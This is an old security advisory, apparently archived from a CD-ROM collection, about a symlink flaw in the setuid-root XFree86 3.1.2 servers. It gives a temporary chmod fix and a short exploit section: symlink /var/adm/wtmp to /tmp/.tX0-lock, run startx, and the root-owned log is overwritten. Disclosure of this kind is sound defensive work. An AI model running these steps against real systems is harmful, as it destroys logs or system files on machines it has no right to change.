home *** CD-ROM | disk | FTP | other *** search
-
-
-
-
- There are security holes in XFree86 3.1.2, which installs its servers
-
- as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files,
-
- it does not take proper precautions to ensure that file permissions are
-
- maintained, resulting in the ability to overwrite files.
-
- The problem stems from the server opening a temporary file,
-
- /tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this
-
- file a symlink, the server will overwrite the original file, and then
-
- write to it its current pid.
-
-
-
- Program: XFree86 3.1.2 servers
-
- Affected Operating Systems: All systems with XFree86 3.1.2 installed
-
- Requirements: account on system
-
- Temporary Patch: chmod o-x /usr/X11R6/bin/XF86*
-
- Security Compromise: overwrite arbitrary files
-
- Author: Dave M. (davem@cmu.edu)
-
- Synopsis: While running suid root, XFree86 servers do
-
- not properly check file permissions, allowing
-
- a user to overwrite arbitrary files on a
-
- system.
-
-
-
-
-
- Exploit:
-
- $ ls -l /var/adm/wtmp
-
- -rw-r--r-- 1 root root 174104 Dec 30 08:31 /var/adm/wtmp
-
- $ ln -s /var/adm/wtmp /tmp/.tX0-lock
-
- $ startx
-
- (At this point exit X if it started, or else ignore any error messages)
-
- $ ls -l /var/adm/wtmp
-
- -r--r--r-- 1 root root 11 Dec 30 08:33 /var/adm/wtmp
-
-
-
-
-
-
-
-
-
-
-
-
